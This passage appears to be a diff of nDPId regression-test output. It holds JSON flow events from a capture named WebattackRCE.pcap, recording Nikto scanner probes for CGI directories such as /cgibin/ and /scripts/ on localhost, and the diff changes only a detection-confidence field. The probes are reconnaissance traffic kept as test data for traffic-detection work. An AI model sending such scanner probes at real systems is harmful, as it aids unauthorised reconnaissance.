(Test:cgi dir check)"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":38,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276714,"flow_last_seen":1576420276714,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420276714,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49618,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00669{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":38,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":1,"flow_last_seen":1576420276714,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420276714,"pkt":"AAAAAAAAAAAAAAAACABFAADCR6dAAEAG9Ix\/AAABfwAAAcHSH5C\/OX\/AhojitYAYAED+tgAAAQEICp1m+xKdZvsSR0VUIC9odGJpbi8gSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpjZ2kgZGlyIGNoZWNrKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":38,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276714,"flow_last_seen":1576420276714,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420276714,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49618,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/htbin\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}} +01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":38,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276714,"flow_last_seen":1576420276714,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420276714,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49618,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/htbin\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":39,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276717,"flow_last_seen":1576420276717,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420276717,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49620,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":39,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":1,"flow_last_seen":1576420276717,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1576420276717,"pkt":"AAAAAAAAAAAAAAAACABFAADD3hBAAEAGXiJ\/AAABfwAAAcHUH5AtGuYWzQuuvoAYAED+twAAAQEICp1m+xSdZvsUR0VUIC9jZ2liaW4vIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6Y2dpIGRpciBjaGVjaykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":39,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276717,"flow_last_seen":1576420276717,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420276717,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49620,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgibin\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}} +01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":39,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276717,"flow_last_seen":1576420276717,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420276717,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49620,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgibin\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":40,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276718,"flow_last_seen":1576420276718,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420276718,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49622,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00663{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":40,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":1,"flow_last_seen":1576420276718,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420276718,"pkt":"AAAAAAAAAAAAAAAACABFAADB4dFAAEAGWmN\/AAABfwAAAcHWH5B7V9nVmVXzCoAYAED+tQAAAQEICp1m+xadZvsWR0VUIC9jZ2lzLyBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6Y2dpIGRpciBjaGVjaykNCg0K"} -01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":40,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276718,"flow_last_seen":1576420276718,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420276718,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49622,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgis\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}} +01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":40,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276718,"flow_last_seen":1576420276718,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420276718,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49622,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgis\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":41,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276719,"flow_last_seen":1576420276719,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276719,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49624,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00668{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":41,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":1,"flow_last_seen":1576420276719,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1576420276719,"pkt":"AAAAAAAAAAAAAAAACABFAADEZD1AAEAG1\/R\/AAABfwAAAcHYH5Ba2lwhPKb01YAYAED+uAAAAQEICp1m+xedZvsXR0VUIC9zY3JpcHRzLyBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OmNnaSBkaXIgY2hlY2spDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":41,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276719,"flow_last_seen":1576420276719,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276719,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49624,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/scripts\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}} +01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":41,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276719,"flow_last_seen":1576420276719,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276719,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49624,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/scripts\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":42,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276721,"flow_last_seen":1576420276721,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276721,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49626,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":42,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":1,"flow_last_seen":1576420276721,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1576420276721,"pkt":"AAAAAAAAAAAAAAAACABFAADEcYRAAEAGyq1\/AAABfwAAAcHaH5DTlEmfv44DhoAYAED+uAAAAQEICp1m+xmdZvsZR0VUIC9jZ2ktd2luLyBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OmNnaSBkaXIgY2hlY2spDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":42,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276721,"flow_last_seen":1576420276721,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276721,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49626,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgi-win\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}} +01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":42,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276721,"flow_last_seen":1576420276721,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276721,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49626,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgi-win\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":43,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276722,"flow_last_seen":1576420276722,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276722,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49628,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":43,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":1,"flow_last_seen":1576420276722,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420276722,"pkt":"AAAAAAAAAAAAAAAACABFAADF6C5AAEAGVAJ\/AAABfwAAAcHcH5DviNAxcnIUCYAYAED+uQAAAQEICp1m+xqdZvsaR0VUIC9mY2dpLWJpbi8gSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OmNnaSBkaXIgY2hlY2spDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01053{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":43,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276722,"flow_last_seen":1576420276722,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276722,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49628,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/fcgi-bin\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}} +01053{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":43,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276722,"flow_last_seen":1576420276722,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276722,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49628,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/fcgi-bin\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":44,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276724,"flow_last_seen":1576420276724,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276724,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49630,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00668{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":44,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":1,"flow_last_seen":1576420276724,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1576420276724,"pkt":"AAAAAAAAAAAAAAAACABFAADEjEdAAEAGr+p\/AAABfwAAAcHeH5D1xLRZpE\/AW4AYAED+uAAAAQEICp1m+xydZvscR0VUIC9jZ2ktZXhlLyBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6Y2dpIGRpciBjaGVjaykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} -01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":44,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276724,"flow_last_seen":1576420276724,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276724,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49630,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgi-exe\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}} +01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":44,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276724,"flow_last_seen":1576420276724,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276724,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49630,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgi-exe\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":45,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276725,"flow_last_seen":1576420276725,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276725,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49632,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":45,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":1,"flow_last_seen":1576420276725,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420276725,"pkt":"AAAAAAAAAAAAAAAACABFAADFFmlAAEAGJch\/AAABfwAAAcHgH5D+Si57PKwG0oAYAED+uQAAAQEICp1m+x2dZvsdR0VUIC9jZ2ktaG9tZS8gSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpjZ2kgZGlyIGNoZWNrKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01053{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":45,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276725,"flow_last_seen":1576420276725,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276725,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49632,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgi-home\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}} 